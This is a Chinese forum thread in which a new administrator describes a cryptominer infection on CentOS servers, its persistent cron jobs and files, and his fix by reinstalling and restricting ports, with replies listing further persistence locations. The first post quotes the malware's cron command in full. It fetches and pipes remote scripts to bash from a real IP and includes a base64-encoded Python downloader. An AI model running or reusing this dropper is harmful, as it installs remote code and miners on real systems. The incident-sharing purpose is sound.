centOS上删不掉的脚本,服务器秒变矿机
本帖最后由 fht000 于 2020-11-11 19:32 编辑上个月接手了几台服务器,上面主要是部署了一套springcloud服务,用了docker镜像部署,使用rancher管理服务器和容器.
接手几天后发现页面访问越来越卡,直到有一天直接404了,上服务器上排查,发现rancher已经停止,服务器上还一直报你有一条邮件的消息,不过是英文的,再次排查后发现CPU和内存大量占用.
执行top命令总算发现了这个东西.....
如果没猜错,这个应该就是所谓的挖矿程序了!
好吧,本以为找到了以后就好处理了,接下来就去找找它再哪里......
这个貌似显示已经是被删除的,没遇到过,找度娘吧.....
经过一同照搬操作发现好多地方都有这个东西下过来的定时任务脚本
打开这些文件之后发现都有定时任务执行......
本来想着,把定时任务执行一次(curl -s http://198.98.57.217/xmi||wget -q -O - http://198.98.57.217/xmi)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xmi /tmp/xmi; bash /tmp/xmi; rm -rf /tmp/xmi,然后按照下载过来的脚本,查看下载过来的文件,然后一个个删除,结果却发现我root账户没有权限,chmod完全不起作用......
在百度查了几篇博客,如这个https://blog.csdn.net/deeplearnings/article/details/77367509,都说需要用chattr命令,然后好不容易删除,再去执行top命令,发现第一张图上的情况没到10秒钟又出现了,再去之前查到脚本文件并删除的地方看.一切被删文件恢复原样,然后就是心态快炸的过程......
最后到查看防火墙和iptables发现所有端口对外开放......
没办法只好用最野蛮的办法了,备份数据库重装系统,配置ip白名单规则,这个世界总算清净了!!!
本来还想附上执行定时任务命令后执行命令行文件一份,有兴趣的童鞋可以看看,结果发现传不上来{:1_896:}
结语:新人第一次发帖,文笔不好,请多包涵{:1_893:},服务器还是要提前配置安全规则,亡羊补牢就太晚了!不过我是接受被人的,这样的事情没法杜绝了...
谢谢各位,帖子图片以及改过来了{:1_893:} 楼主,我建议你再看看,没啥意外的话你还是没有清理干净
ps -ef |grep urllib 这个是病毒用python去下载后续文件
ps -ef |grep perl 同理,用perl下载
cd/tmp/.pwn 你看到的那个dbused是从这个文件夹里拷贝过去的
crontab -e 计划任务
vi /root/.bash_profile 病毒写到了开机自启动里
fht000 发表于 2020-11-11 19:04
学到了,第一次发帖没经验,还没有预览和重编,错了也没法子改
错了可以改的,帖子一个月内都可以编辑 在你要插入图片的位置点一下,再点图片,就可以把图片插入 正己 发表于 2020-11-11 18:59
在你要插入图片的位置点一下,再点图片,就可以把图片插入
学到了,第一次发帖没经验,还没有预览和重编,错了也没法子改:lol 错了可以改的 哦哦哦 +1 感谢楼主分享 收藏了 学习一下 图片是不是重复发了一遍? efujin 发表于 2020-11-11 20:04
图片是不是重复发了一遍?
下面的多出来的,好像没法删
本帖最后由 efujin 于 2020-11-11 20:29 编辑
fht000 发表于 2020-11-11 20:06
下面的多出来的,好像没法删
你上传到附件里了
把附件里的图片都删掉即可。